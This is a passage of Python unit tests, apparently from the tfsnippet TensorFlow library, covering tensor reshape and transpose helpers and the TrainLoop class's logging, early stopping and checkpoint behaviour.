with pytest.raises(ValueError, match='Invalid axis: must >= -6 and '
'<= 5, got 6'):
_ = broadcast_concat(a_ph, b_ph, axis=6)
with pytest.raises(ValueError, match='`x` and `y` cannot be '
'broadcast concat'):
_ = broadcast_concat(tf.zeros([2, 2]), tf.zeros([3, 3]), axis=0)
# runtime check
t = broadcast_concat(a_ph, b_ph, axis=-1)
with pytest.raises(Exception, match='`x` and `y` cannot be '
'broadcast concat'):
_ = sess.run(t, feed_dict={
a_ph: np.random.normal(size=[3, 3, 1, 7, 1]),
b_ph: np.random.normal(size=[6, 4, 1, 5, 7, 8]),
})
class TransposeConv2dAxisTestCase(tf.test.TestCase):
def test_transpose_conv2d_axis(self):
np.random.seed(1234)
x = np.random.normal(size=[17, 11, 32, 31, 5]).astype(np.float32)
x_ph = tf.placeholder(tf.float32, [None, None, None, None, 5])
y = np.transpose(x, [0, 1, 4, 2, 3])
self.assertEqual(y.shape, (17, 11, 5, 32, 31))
y_ph = tf.placeholder(tf.float32, [None, None, 5, None, None])
g = lambda x, f, t, ph=None: sess.run(
transpose_conv2d_axis(tf.constant(x), f, t),
feed_dict=({ph: x} if ph is not None else None)
)
with self.test_session() as sess:
# test static shape
np.testing.assert_allclose(g(x, True, True), x)
np.testing.assert_allclose(g(x, True, False), y)
np.testing.assert_allclose(g(y, False, True), x)
np.testing.assert_allclose(g(y, False, False), y)
# test dynamic shape
np.testing.assert_allclose(g(x, True, True, x_ph), x)
np.testing.assert_allclose(g(x, True, False, x_ph), y)
np.testing.assert_allclose(g(y, False, True, y_ph), x)
np.testing.assert_allclose(g(y, False, False, y_ph), y)
def test_transpose_conv2d_channels_x_to_x(self):
np.random.seed(1234)
x = np.random.normal(size=[17, 11, 32, 31, 5]).astype(np.float32)
y = np.transpose(x, [0, 1, 4, 2, 3])
self.assertEqual(y.shape, (17, 11, 5, 32, 31))
with self.test_session() as sess:
# test conv2d_channels_last_to_x
g = lambda t, c: sess.run(
transpose_conv2d_channels_last_to_x(tf.constant(t), c))
np.testing.assert_allclose(g(x, True), x)
np.testing.assert_allclose(g(x, False), y)
# test conv2d_channels_x_to_last
g = lambda t, c: sess.run(
transpose_conv2d_channels_x_to_last(tf.constant(t), c))
np.testing.assert_allclose(g(x, True), x)
np.testing.assert_allclose(g(y, False), x)
class ReshapeTailTestCase(tf.test.TestCase):
def test_reshape_tail(self):
def check(x, ndims, shape, expected_shape, static_shape=None,
x_ph=None, shape_ph=None):
# compute the answer
assert(len(x.shape) >= ndims)
if ndims > 0:
y = np.reshape(x, x.shape[:-ndims] + tuple(shape))
else:
y = np.reshape(x, x.shape + tuple(shape))
self.assertEqual(y.shape, expected_shape)
# validate the output
feed_dict = {}
if x_ph is not None:
feed_dict[x_ph] = x
x = x_ph
if shape_ph is not None:
feed_dict[shape_ph] = shape
shape = shape_ph
y_tensor = reshape_tail(x, ndims, shape)
if static_shape is not None:
self.assertTupleEqual(get_static_shape(y_tensor), static_shape)
y_out = sess.run(y_tensor, feed_dict=feed_dict)
self.assertTupleEqual(y_out.shape, y.shape)
np.testing.assert_equal(y_out, y)
x = np.random.normal(size=[4, 5, 6]).astype(np.float32)
with self.test_session() as sess:
# check static shape
check(x, 0, [], (4, 5, 6), (4, 5, 6))
check(x, 0, [1, 1], (4, 5, 6, 1, 1), (4, 5, 6, 1, 1))
check(x, 1, [-1], (4, 5, 6), (4, 5, 6))
check(x, 1, [2, 3], (4, 5, 2, 3), (4, 5, 2, 3))
check(x, 2, [-1], (4, 30), (4, 30))
check(x, 2, [6, 5], (4, 6, 5), (4, 6, 5))
check(x, 2, [3, 2, 5], (4, 3, 2, 5), (4, 3, 2, 5))
check(x, 3, [-1], (120,), (120,))
check(x, 3, [3, -1], (3, 40), (3, 40))
# check dynamic shape #1
x_ph = tf.placeholder(dtype=tf.float32, shape=[None, 5, 6])
check(x, 0, [], (4, 5, 6), (None, 5, 6), x_ph=x_ph)
check(x, 0, [1, 1], (4, 5, 6, 1, 1), (None, 5, 6, 1, 1),
x_ph=x_ph)
check(x, 1, [-1], (4, 5, 6), (None, 5, 6), x_ph=x_ph)
check(x, 1, [2, -1], (4, 5, 2, 3), (None, 5, 2, 3), x_ph=x_ph)
check(x, 2, [-1], (4, 30), (None, 30), x_ph=x_ph)
check(x, 2, [-1, 5], (4, 6, 5), (None, 6, 5), x_ph=x_ph)
check(x, 2, [3, -1, 5], (4, 3, 2, 5), (None, 3, 2, 5), x_ph=x_ph)
check(x, 3, [-1], (120,), (None,), x_ph=x_ph)
check(x, 3, [3, -1], (3, 40), (3, None), x_ph=x_ph)
# check dynamic shape #2
x_ph = tf.placeholder(dtype=tf.float32, shape=[None, 5, None])
check(x, 0, [], (4, 5, 6), (None, 5, None), x_ph=x_ph)
check(x, 0, [1, 1], (4, 5, 6, 1, 1), (None, 5, None, 1, 1),
x_ph=x_ph)
check(x, 1, [-1], (4, 5, 6), (None, 5, None), x_ph=x_ph)
check(x, 1, [2, 3], (4, 5, 2, 3), (None, 5, 2, 3), x_ph=x_ph)
check(x, 2, [-1], (4, 30), (None, None), x_ph=x_ph)
check(x, 2, [6, 5], (4, 6, 5), (None, 6, 5), x_ph=x_ph)
check(x, 2, [3, 2, 5], (4, 3, 2, 5), (None, 3, 2, 5), x_ph=x_ph)
check(x, 3, [-1], (120,), (None,), x_ph=x_ph)
check(x, 3, [3, -1], (3, 40), (3, None), x_ph=x_ph)
# check fully dynamic shape
x_ph = tf.placeholder(dtype=tf.float32, shape=None)
shape_ph = tf.placeholder(dtype=tf.int32, shape=None)
check(x, 0, [], (4, 5, 6), x_ph=x_ph, shape_ph=shape_ph)
check(x, 0, [1, 1], (4, 5, 6, 1, 1), x_ph=x_ph, shape_ph=shape_ph)
check(x, 1, [-1], (4, 5, 6), x_ph=x_ph, shape_ph=shape_ph)
check(x, 1, [2, 3], (4, 5, 2, 3), x_ph=x_ph, shape_ph=shape_ph)
check(x, 2, [-1], (4, 30), x_ph=x_ph, shape_ph=shape_ph)
check(x, 2, [6, 5], (4, 6, 5), x_ph=x_ph, shape_ph=shape_ph)
check(x, 2, [3, 2, 5], (4, 3, 2, 5), x_ph=x_ph, shape_ph=shape_ph)
check(x, 3, [-1], (120,), x_ph=x_ph, shape_ph=shape_ph)
check(x, 3, [3, -1], (3, 40), x_ph=x_ph, shape_ph=shape_ph)
# check errors
with pytest.raises(ValueError,
match='`shape` is not a valid shape: at most '
'one `-1` can be specified'):
_ = reshape_tail(x, 1, [-1, -1])
with pytest.raises(ValueError,
match='`shape` is not a valid shape: 0 is not '
'allowed'):
_ = reshape_tail(x, 1, [0])
with pytest.raises(Exception,
match=r'rank\(input\) must be at least ndims'):
_ = sess.run(reshape_tail(x, 5, [-1]))
with pytest.raises(Exception,
match=r'rank\(input\) must be at least ndims'):
_ = sess.run(reshape_tail(x_ph, 5, [-1]), feed_dict={x_ph: x})
with pytest.raises(Exception,
match=r'Cannot reshape the tail dimensions of '
r'`input` into `shape`'):
_ = sess.run(reshape_tail(x, 2, [7, -1]))
```
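The `check` helper above pins down `reshape_tail` in terms of a plain NumPy reshape of the trailing `ndims` axes. A minimal NumPy-only sketch of that equivalence (not part of the test suite, and assuming nothing beyond NumPy):
```python
import numpy as np

def reshape_tail_np(x, ndims, shape):
    """NumPy equivalent of the behaviour the checks above expect:
    replace the last `ndims` axes of `x` with `shape`."""
    front = x.shape[:-ndims] if ndims > 0 else x.shape
    return np.reshape(x, front + tuple(shape))

x = np.random.normal(size=[4, 5, 6]).astype(np.float32)
assert reshape_tail_np(x, 2, [-1]).shape == (4, 30)
assert reshape_tail_np(x, 1, [2, 3]).shape == (4, 5, 2, 3)
assert reshape_tail_np(x, 0, [1, 1]).shape == (4, 5, 6, 1, 1)
```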
#### File: tests/scaffold/test_train_loop.py
```python
import os
import re
import time
from collections import OrderedDict
import pytest
import numpy as np
import tensorflow as tf
from mock import Mock
from tfsnippet.dataflows import DataFlow
from tfsnippet.scaffold import (TrainLoop, CheckpointSavableObject,
ScheduledVariable)
from tfsnippet.scaffold.train_loop_ import (TRAIN_LOOP_STATES_CKPT_NAME,
EARLY_STOPPING_STATES_CKPT_NAME)
from tfsnippet.utils import (TemporaryDirectory,
ensure_variables_initialized,
get_default_session_or_error)
def get_variable_values(variables):
sess = get_default_session_or_error()
return sess.run(variables)
def set_variable_values(variables, values):
sess = get_default_session_or_error()
sess.run([tf.assign(v, a) for v, a in zip(variables, values)])
class TrainLoopTestCase(tf.test.TestCase):
def assertMatches(self, a, b):
        self.assertTrue(
            bool(re.match(b, a)),
            msg='{!r} does not match pattern {!r}'.format(a, b)
        )
def test_counter_attributes(self):
with TrainLoop([]) as loop:
self.assertEqual(loop.epoch, 0)
self.assertEqual(loop.step, 0)
self.assertIsNone(loop.max_epoch)
self.assertIsNone(loop.max_step)
self.assertFalse(loop.within_epoch)
self.assertFalse(loop.within_step)
with TrainLoop([], max_epoch=2, max_step=10,
summary_metric_prefix='123/') as loop:
self.assertEqual(loop.max_epoch, 2)
self.assertEqual(loop.max_step, 10)
self.assertEqual(loop._summary_metric_prefix, '123/')
loop.max_epoch = 20
loop.max_step = 100
self.assertEqual(loop.max_epoch, 20)
self.assertEqual(loop.max_step, 100)
def test_counters(self):
# test loop with configured `max_epoch`
with TrainLoop([], max_epoch=2) as loop:
epoch_counter = 0
step_counter = 0
for epoch in loop.iter_epochs():
epoch_counter += 1
self.assertEqual(epoch, epoch_counter)
self.assertTrue(loop.within_epoch)
self.assertFalse(loop.within_step)
x_ans = 0
for step, [x] in \
loop.iter_steps(DataFlow.arrays([np.arange(4)], 1)):
self.assertTrue(loop.within_step)
self.assertEqual(step, loop.step)
self.assertEqual(epoch, loop.epoch)
self.assertEqual(x, x_ans)
self.assertIsInstance(loop.step_data, tuple)
self.assertEqual(len(loop.step_data), 1)
np.testing.assert_equal(loop.step_data[0], x_ans)
x_ans += 1
step_counter += 1
self.assertEqual(step, step_counter)
self.assertEqual(step_counter, loop.step)
self.assertEqual(epoch, loop.epoch)
self.assertEqual(epoch_counter, 2)
self.assertEqual(step_counter, 8)
# test loop with configured `max_step`
with TrainLoop([], max_step=10) as loop:
epoch_counter = 0
step_counter = 0
for epoch in loop.iter_epochs():
epoch_counter += 1
self.assertEqual(epoch, epoch_counter)
for step in loop.iter_steps():
step_counter += 1
self.assertEqual(step, step_counter)
self.assertEqual(epoch_counter, 1)
self.assertEqual(step_counter, 10)
# test loop with configured `max_step` with payload
with TrainLoop([], max_step=10) as loop:
epoch_counter = 0
step_counter = 0
for epoch in loop.iter_epochs():
epoch_counter += 1
self.assertEqual(epoch, epoch_counter)
x_ans = 0
for step, x in loop.iter_steps(np.arange(4)):
self.assertEqual(x, x_ans)
x_ans += 1
step_counter += 1
self.assertEqual(step, step_counter)
self.assertEqual(epoch_counter, 3)
self.assertEqual(step_counter, 10)
# test loop with configured `max_step` and `max_epoch`,
# while `max_epoch` finishes first
with TrainLoop([], max_step=10, max_epoch=2) as loop:
epoch_counter = 0
step_counter = 0
for epoch in loop.iter_epochs():
epoch_counter += 1
self.assertEqual(epoch, epoch_counter)
for step, _ in loop.iter_steps(np.arange(4)):
step_counter += 1
self.assertEqual(step, step_counter)
self.assertEqual(epoch_counter, 2)
self.assertEqual(step_counter, 8)
# test loop with configured `max_step` and `max_epoch`,
# while `max_step` finishes first
with TrainLoop([], max_step=10, max_epoch=3) as loop:
epoch_counter = 0
step_counter = 0
for epoch in loop.iter_epochs():
epoch_counter += 1
self.assertEqual(epoch, epoch_counter)
for step, _ in loop.iter_steps(np.arange(4)):
step_counter += 1
self.assertEqual(step, step_counter)
self.assertEqual(epoch_counter, 3)
self.assertEqual(step_counter, 10)
def test_get_progress(self):
null_print = lambda x: None
# test no progress
with TrainLoop([], max_epoch=None, max_step=None) as loop:
self.assertIsNone(loop.get_progress())
# test infer progress from epoch
with TrainLoop([], max_epoch=10, max_step=None,
print_func=null_print) as loop:
np.testing.assert_allclose(0., loop.get_progress())
for i in loop.iter_epochs():
np.testing.assert_allclose((i - 1) * .1, loop.get_progress())
loop.print_logs()
np.testing.assert_allclose(i * .1, loop.get_progress())
np.testing.assert_allclose(1., loop.get_progress())
# test infer progress from step
with TrainLoop([], max_epoch=None, max_step=100,
print_func=null_print) as loop:
np.testing.assert_allclose(0., loop.get_progress())
for _ in loop.iter_epochs():
for _ in loop.iter_steps([0, 1, 2]):
step = loop.step
np.testing.assert_allclose(
(step - 1) * .01, loop.get_progress())
loop.print_logs()
np.testing.assert_allclose(
step * .01, loop.get_progress())
np.testing.assert_allclose(1., loop.get_progress())
# test infer progress from epoch & steps_per_epoch
with TrainLoop([], max_epoch=10, print_func=null_print) as loop:
np.testing.assert_allclose(0., loop.get_progress())
for i in loop.iter_epochs():
np.testing.assert_allclose((i - 1) * .1, loop.get_progress())
for _, j in loop.iter_steps([0, 1, 2, 3, 4]):
if i == 1:
np.testing.assert_allclose(0., loop.get_progress())
loop.print_logs()
np.testing.assert_allclose(0., loop.get_progress())
else:
np.testing.assert_allclose(
(i - 1) * .1 + j * .02, loop.get_progress())
loop.print_logs()
np.testing.assert_allclose(
(i - 1) * .1 + (j + 1) * .02, loop.get_progress())
if i == 1:
np.testing.assert_allclose(0., loop.get_progress())
loop.print_logs()
np.testing.assert_allclose(.1, loop.get_progress())
else:
np.testing.assert_allclose(i * .1, loop.get_progress())
loop.print_logs()
np.testing.assert_allclose(i * .1, loop.get_progress())
np.testing.assert_allclose(1., loop.get_progress())
def test_logs(self):
logs = []
with TrainLoop([], max_step=6, print_func=logs.append) as loop:
for epoch in loop.iter_epochs():
for step, x in loop.iter_steps(np.arange(4)):
time.sleep(0.01)
loop.collect_metrics(x=x)
if step % 2 == 0:
loop.print_logs()
loop.collect_metrics(y=epoch)
loop.print_logs()
self.assertMatches('\n'.join(logs), re.compile(
r'^'
r'\[Epoch 1, Step 2/6, ETA \S+\] step time: 0\.01\d*s \(±[^ ]+s\); '
r'x: 0\.5 \(±0\.5\)\n'
r'\[Epoch 1, Step 4/6, ETA \S+\] step time: 0\.01\d*s \(±[^ ]+s\); '
r'x: 2\.5 \(±0\.5\)\n'
r'\[Epoch 1, Step 4/6, ETA \S+\] epoch time: 0\.0[456]\d*s; '
r'step time: 0\.01\d*s \(±[^ ]+s\); x: 1\.5 \(±1\.11803\); '
r'y: 1\n'
r'\[Epoch 2, Step 6/6, ETA \S+\] step time: 0\.01\d*s \(±[^ ]+s\); '
r'x: 0\.5 \(±0\.5\)\n'
r'\[Epoch 2, Step 6/6, ETA \S+\] epoch time: 0\.0[23]\d*s; '
r'step time: 0\.01\d*s \(±[^ ]+s\); x: 0\.5 \(±0\.5\); y: 2'
r'$'
))
def test_single_epoch_logs(self):
logs = []
with TrainLoop([], max_epoch=1, print_func=logs.append,
show_eta=False) as loop:
for epoch in loop.iter_epochs():
for step, x in loop.iter_steps(np.arange(4)):
time.sleep(0.01)
loop.collect_metrics(x=x)
if step % 2 == 0:
loop.print_logs()
loop.collect_metrics(y=epoch)
loop.print_logs()
self.assertMatches('\n'.join(logs), re.compile(
r'^'
r'\[Step 2\] step time: 0\.01\d*s \(±[^ ]+s\); '
r'x: 0\.5 \(±0\.5\)\n'
r'\[Step 4\] step time: 0\.01\d*s \(±[^ ]+s\); '
r'x: 2\.5 \(±0\.5\)\n'
r'\[Step 4\] epoch time: 0\.0[456]\d*s; '
r'step time: 0\.01\d*s \(±[^ ]+s\); x: 1\.5 \(±1\.11803\); '
r'y: 1'
r'$'
))
def test_valid_metric_default_settings(self):
logs = []
with TrainLoop([], print_func=logs.append, show_eta=False) as loop:
self.assertEqual(loop.valid_metric_name, 'valid_loss')
self.assertTrue(loop.valid_metric_smaller_is_better)
self.assertFalse(loop.use_early_stopping)
for _ in loop.iter_epochs():
best_metric = 1.
for _, valid_loss in loop.iter_steps([0.8, 0.6, 0.7]):
loop.collect_metrics(valid_loss=valid_loss)
best_metric = min(best_metric, valid_loss)
self.assertAlmostEqual(loop.best_valid_metric, best_metric)
loop.print_logs()
loop.print_logs()
break
self.assertAlmostEqual(loop.best_valid_metric, 0.6)
self.assertMatches('\n'.join(logs), re.compile(
r'^'
r'\[Epoch 1, Step 1\] step time: [^ ]+s; '
r'valid loss: 0\.8 \(\*\)\n'
r'\[Epoch 1, Step 2\] step time: [^ ]+s; '
r'valid loss: 0\.6 \(\*\)\n'
r'\[Epoch 1, Step 3\] step time: [^ ]+s; '
r'valid loss: 0\.7\n'
r'\[Epoch 1, Step 3\] epoch time: [^ ]+s; step time: [^ ]+s '
r'\(±[^ ]+s\); valid loss: 0\.7 \(±0\.0816497\)'
r'$'
))
def test_valid_metric_with_custom_settings(self):
logs = []
v = tf.get_variable('a', shape=[1], dtype=tf.int32)
with TrainLoop([v], print_func=logs.append, show_eta=False,
valid_metric_name='y',
valid_metric_smaller_is_better=False) as loop:
self.assertEqual(loop.valid_metric_name, 'y')
self.assertFalse(loop.valid_metric_smaller_is_better)
for _ in loop.iter_epochs():
best_metric = 0.
for _, y in loop.iter_steps([0.7, 0.6, 0.8]):
loop.collect_metrics(y=y)
best_metric = max(best_metric, y)
self.assertAlmostEqual(loop.best_valid_metric, best_metric)
loop.print_logs()
loop.print_logs()
break
self.assertAlmostEqual(loop.best_valid_metric, 0.8)
self.assertMatches('\n'.join(logs), re.compile(
r'^'
r'\[Epoch 1, Step 1\] step time: [^ ]+s; '
r'y: 0\.7 \(\*\)\n'
r'\[Epoch 1, Step 2\] step time: [^ ]+s; '
r'y: 0\.6\n'
r'\[Epoch 1, Step 3\] step time: [^ ]+s; '
r'y: 0\.8 \(\*\)\n'
r'\[Epoch 1, Step 3\] epoch time: [^ ]+s; step time: [^ ]+s '
r'\(±[^ ]+s\); y: 0\.7 \(±0\.0816497\)'
r'$'
))
def test_valid_metric_with_valid_acc(self):
with TrainLoop([], valid_metric_name='valid_acc') as loop:
self.assertEqual(loop.valid_metric_name, 'valid_acc')
self.assertFalse(loop.valid_metric_smaller_is_better)
def test_valid_metric_with_y_as_name(self):
with TrainLoop([], valid_metric_name='y') as loop:
self.assertEqual(loop.valid_metric_name, 'y')
self.assertTrue(loop.valid_metric_smaller_is_better)
def test_training_summary(self):
a = tf.get_variable('a', dtype=tf.float32, shape=(2, 3))
b = tf.get_variable('b', dtype=tf.float32, shape=(4,))
# test param variables in list
logs = []
with TrainLoop([a, b], print_func=logs.append) as loop:
self.assertEqual(loop.param_vars, [a, b])
loop.print_training_summary()
self.assertEqual('\n'.join(logs), (
'Trainable Parameters (10 in total)\n'
'----------------------------------\n'
'a (2, 3) 6\n'
'b (4,) 4\n'
))
# test param variables in dict
logs = []
with TrainLoop(OrderedDict([('aa', a), ('bb', b)]),
print_func=logs.append) as loop:
self.assertEqual(loop.param_vars, {'aa': a, 'bb': b})
loop.print_training_summary()
self.assertEqual('\n'.join(logs), (
'Trainable Parameters (10 in total)\n'
'----------------------------------\n'
'aa (2, 3) 6\n'
'bb (4,) 4\n'
))
def test_timeit(self):
logs = []
with TrainLoop([], max_epoch=1, print_func=logs.append,
show_eta=False) as loop:
for _ in loop.iter_epochs():
with loop.timeit('x_timer'):
time.sleep(0.01)
with loop.timeit('y_time'):
time.sleep(0.02)
loop.print_logs()
self.assertMatches('\n'.join(logs), re.compile(
r'^'
r'\[Step 0\] epoch time: 0\.0[345]\d*s; '
r'x timer: 0\.01\d*s; y time: 0\.0[23]\d*s'
r'$'
))
def test_metric_collector(self):
logs = []
with TrainLoop([], max_epoch=1, print_func=logs.append,
show_eta=False) as loop:
for _ in loop.iter_epochs():
with loop.metric_collector('x') as acc:
acc.collect(2)
acc.collect(3, weight=3)
loop.print_logs()
self.assertMatches('\n'.join(logs), re.compile(
r'^'
r'\[Step 0\] epoch time: [^ ]+s; x: 2\.75'
r'$'
))
def test_summary_writer(self):
def read_summary(summary_dir):
# read the metric summary
loss_steps = []
loss_values = []
valid_loss_steps = []
valid_loss_values = []
x_steps = []
x_values = []
tags = set()
event_file_path = os.path.join(
summary_dir, os.listdir(summary_dir)[0])
for e in tf.train.summary_iterator(event_file_path):
for v in e.summary.value:
tags.add(v.tag)
if v.tag == 'metrics/loss':
loss_steps.append(e.step)
loss_values.append(v.simple_value)
elif v.tag == 'metrics/valid_loss':
valid_loss_steps.append(e.step)
valid_loss_values.append(v.simple_value)
elif v.tag == 'x':
x_steps.append(e.step)
x_values.append(v.simple_value)
return (tags, loss_steps, loss_values, valid_loss_steps,
valid_loss_values, x_steps, x_values)
# test enable summary with `summary_dir`
with TemporaryDirectory() as tempdir:
with TrainLoop([], max_epoch=2, summary_dir=tempdir,
summary_graph=tf.get_default_graph()) as loop:
self.assertIsInstance(loop.summary_writer,
tf.summary.FileWriter)
for epoch in loop.iter_epochs():
for _, loss in loop.iter_steps([0.7, 0.6, 0.8]):
loop.collect_metrics(loss=epoch + loss)
loop.collect_metrics(valid_loss=epoch)
with self.test_session():
summary_op = tf.summary.scalar('x', tf.constant(1.23))
loop.add_summary(summary_op.eval())
obj = read_summary(tempdir)
self.assertEqual(
['metrics/loss', 'metrics/valid_loss', 'x'],
sorted(obj[0])
)
np.testing.assert_equal(obj[1], [1, 2, 3, 4, 5, 6])
np.testing.assert_almost_equal(
obj[2],
[1.7, 1.6, 1.8, 2.7, 2.6, 2.8]
)
np.testing.assert_equal(obj[3], [3, 6])
np.testing.assert_almost_equal(obj[4], [1, 2])
np.testing.assert_equal(obj[5], [6])
np.testing.assert_almost_equal(obj[6], [1.23])
# test enable summary with `summary_writer`
with TemporaryDirectory() as tempdir:
sw = tf.summary.FileWriter(tempdir)
with TrainLoop([], max_epoch=2, summary_writer=sw) as loop:
self.assertIs(loop.summary_writer, sw)
self.assertIs(loop._summary_writer, sw)
for epoch in loop.iter_epochs():
for _, loss in loop.iter_steps([0.7, 0.6, 0.8]):
loop.collect_metrics(loss=epoch + loss)
loop.collect_metrics(valid_loss=epoch)
sw.close()
self.assertEqual(
sorted(read_summary(tempdir)[0]),
['metrics/loss', 'metrics/valid_loss']
)
with TemporaryDirectory() as tempdir:
sw = tf.summary.FileWriter(tempdir)
with TrainLoop([], max_epoch=2, summary_writer=sw) as loop:
self.assertIs(loop._summary_writer, sw)
for epoch in loop.iter_epochs():
for _, loss in loop.iter_steps([0.7, 0.6, 0.8]):
loop.collect_metrics(loss=epoch + loss)
loop.collect_metrics(valid_loss=epoch)
sw.close()
self.assertEqual(
sorted(read_summary(tempdir)[0]),
['metrics/loss', 'metrics/valid_loss']
)
def test_early_stopping(self):
with self.test_session():
a = tf.get_variable('a', shape=(), dtype=tf.int32)
b = tf.get_variable('b', shape=(), dtype=tf.int32)
# test early-stopping with no valid metric committed
set_variable_values([a, b], [1, 2])
self.assertEqual(get_variable_values([a, b]), [1, 2])
with TrainLoop([a], early_stopping=True) as loop:
self.assertTrue(loop.use_early_stopping)
set_variable_values([a, b], [10, 20])
self.assertEqual(get_variable_values([a, b]), [10, 20])
# test early-stopping with smaller-better metric
set_variable_values([a, b], [1, 2])
self.assertEqual(get_variable_values([a, b]), [1, 2])
with TrainLoop([a], max_epoch=1, early_stopping=True) as loop:
for _ in loop.iter_epochs():
for step, valid_loss in loop.iter_steps([0.7, 0.6, 0.8]):
set_variable_values([a, b], [10 + step, 20 + step])
loop.collect_metrics(valid_loss=valid_loss)
self.assertAlmostEqual(loop.best_valid_metric, 0.6)
self.assertEqual(get_variable_values([a, b]), [12, 23])
# test early-stopping with larger-better metric
set_variable_values([a, b], [1, 2])
self.assertEqual(get_variable_values([a, b]), [1, 2])
with TrainLoop([a],
max_epoch=1,
valid_metric_name='y',
valid_metric_smaller_is_better=False,
early_stopping=True) as loop:
for _ in loop.iter_epochs():
for step, y in loop.iter_steps([0.7, 0.6, 0.8]):
set_variable_values([a, b], [10 + step, 20 + step])
loop.collect_metrics(y=y)
self.assertAlmostEqual(loop.best_valid_metric, 0.8)
self.assertEqual(get_variable_values([a, b]), [13, 23])
def test_checkpoint(self):
class MyObject(CheckpointSavableObject):
def __init__(self):
self.value = 123
def get_state(self):
return {'value': self.value}
def set_state(self, state):
self.value = state['value']
o = MyObject()
var = ScheduledVariable('var', initial_value=456, dtype=tf.int32)
with self.test_session() as sess, \
TemporaryDirectory() as tempdir:
ensure_variables_initialized()
with TrainLoop([var.variable],
checkpoint_dir=tempdir,
checkpoint_save_objects={'o': o}) as loop:
loop.make_checkpoint()
# test restore_checkpoint == True
o.value = 1234
var.set(4567)
self.assertEqual(o.value, 1234)
self.assertEqual(var.get(), 4567)
with TrainLoop([var.variable],
checkpoint_dir=tempdir,
                           checkpoint_save_objects={'o': o}) as loop:
self.assertEqual(loop.epoch, 0)
self.assertEqual(loop.step, 0)
self.assertEqual(o.value, 123)
self.assertEqual(var.get(), 456)
# test restore_checkpoint == False, and generate new checkpoints
o.value = 1234
var.set(4567)
with TrainLoop([var.variable],
checkpoint_dir=tempdir,
checkpoint_save_objects={'o': o},
checkpoint_epoch_freq=2,
restore_checkpoint=False,
max_epoch=8) as loop:
self.assertEqual(loop.epoch, 0)
self.assertEqual(loop.step, 0)
self.assertEqual(o.value, 1234)
self.assertEqual(var.get(), 4567)
for epoch in loop.iter_epochs():
for _ in loop.iter_steps([1, 1]):
pass
o.value = 9120 + epoch
var.set(9450 + epoch)
# restore from latest
with TrainLoop([var.variable],
checkpoint_dir=tempdir,
checkpoint_save_objects={'o': o}) as loop:
self.assertEqual(loop.epoch, 8)
self.assertEqual(loop.step, 16)
self.assertEqual(o.value, 9128)
self.assertEqual(var.get(), 9458)
# restore from specified file
for epoch in [2, 4, 6, 8]:
restore_checkpoint = os.path.join(
tempdir, 'checkpoint/checkpoint.dat-{}'.format(epoch * 2))
with TrainLoop([var.variable],
checkpoint_dir=tempdir,
checkpoint_save_objects={'o': o},
restore_checkpoint=restore_checkpoint) as loop:
self.assertEqual(loop.epoch, epoch)
self.assertEqual(loop.step, epoch * 2)
self.assertEqual(o.value, 9120 + epoch)
self.assertEqual(var.get(), 9450 + epoch)
def test_checkpoint_and_early_stopping(self):
with self.test_session(), TemporaryDirectory() as tempdir:
a = tf.get_variable('a', shape=(), dtype=tf.int32)
b = tf.get_variable('b', shape=(), dtype=tf.int32)
# test early-stopping with no valid metric committed
set_variable_values([a, b], [1, 2])
self.assertEqual(get_variable_values([a, b]), [1, 2])
with TrainLoop([a],
checkpoint_dir=tempdir,
early_stopping=True) as loop:
self.assertTrue(loop.use_early_stopping)
set_variable_values([a, b], [10, 20])
loop.make_checkpoint()
self.assertEqual(get_variable_values([a, b]), [10, 20])
# test early-stopping with smaller-better metric, 1st loop
set_variable_values([a, b], [1, 2])
with pytest.raises(KeyboardInterrupt):
with TrainLoop([a],
max_epoch=2,
checkpoint_dir=tempdir,
early_stopping=True) as loop:
self.assertIsNone(loop.best_valid_metric)
self.assertEqual(get_variable_values([a, b]), [10, 20])
for i, epoch in enumerate(loop.iter_epochs(), 1):
self.assertEqual(epoch, i)
for j, (step, valid_loss) in \
enumerate(loop.iter_steps([0.7, 0.6, 0.8]), 1):
self.assertEqual(step, j)
set_variable_values([a, b], [10 + step, 20 + step])
loop.collect_metrics(valid_loss=valid_loss)
loop.make_checkpoint()
raise KeyboardInterrupt()
# because the loop is interrupted, the early-stopping should not
# restore the variables to the best state
self.assertEqual(get_variable_values([a, b]), [13, 23])
# test early-stopping with smaller-better metric, 2nd loop
with TrainLoop([a],
max_epoch=2,
checkpoint_dir=tempdir,
early_stopping=True) as loop:
self.assertEqual(loop.best_valid_metric, 0.6)
self.assertEqual(get_variable_values([a, b]), [13, 23])
for i, epoch in enumerate(loop.iter_epochs(), 2):
self.assertEqual(epoch, i)
for j, (step, valid_loss) in \
enumerate(loop.iter_steps([0.9]), 4):
self.assertEqual(step, j)
set_variable_values([a, b], [10 + step, 20 + step])
loop.collect_metrics(valid_loss=valid_loss)
self.assertAlmostEqual(loop.best_valid_metric, 0.6)
self.assertEqual(get_variable_values([a, b]), [12, 24])
def test_tensor_arguments(self):
with self.test_session():
a = tf.get_variable('a', initializer=0, dtype=tf.int32)
ensure_variables_initialized()
with TrainLoop([a],
early_stopping=True,
max_epoch=tf.constant(6),
max_step=tf.constant(7)) as loop:
self.assertEqual(loop.max_epoch, 6)
self.assertEqual(loop.max_step, 7)
def test_errors(self):
with TemporaryDirectory() as tempdir:
with pytest.raises(ValueError, match='`checkpoint_epoch_freq` must '
'be a positive integer'):
with TrainLoop([], checkpoint_dir=tempdir,
checkpoint_epoch_freq=0):
pass
with pytest.raises(ValueError,
match='Currently `early_stopping = True` is not '
'supported when a file path is '
'specified for `restore_checkpoint`'):
with TrainLoop([],
checkpoint_dir=tempdir,
early_stopping=True,
restore_checkpoint=os.path.join(
tempdir, 'checkpoint.dat')):
pass
with pytest.raises(RuntimeError, match='Checkpoint directory is '
'not configured'):
with TrainLoop([]) as loop:
loop.make_checkpoint()
obj = Mock(
spec=CheckpointSavableObject,
get_state=Mock(return_value={}),
set_state=Mock()
)
with pytest.raises(KeyError, match='Name is reserved for '
'`checkpoint_save_objects`'):
with TrainLoop([], checkpoint_dir=tempdir,
checkpoint_save_objects={
TRAIN_LOOP_STATES_CKPT_NAME: obj
}):
pass
with pytest.raises(KeyError, match='Name is reserved for '
'`checkpoint_save_objects`'):
with TrainLoop([], checkpoint_dir=tempdir,
checkpoint_save_objects={
EARLY_STOPPING_STATES_CKPT_NAME: obj
}):
pass
with pytest.raises(
RuntimeError, match='Another epoch loop has been opened'):
with TrainLoop([], max_epoch=10) as loop:
for _ in loop.iter_epochs():
for _ in loop.iter_epochs():
pass
with pytest.raises(
RuntimeError, match='Step loop must be opened within active '
'epoch loop'):
with TrainLoop([], max_step=10) as loop:
for _ in loop.iter_steps():
pass
with pytest.raises(
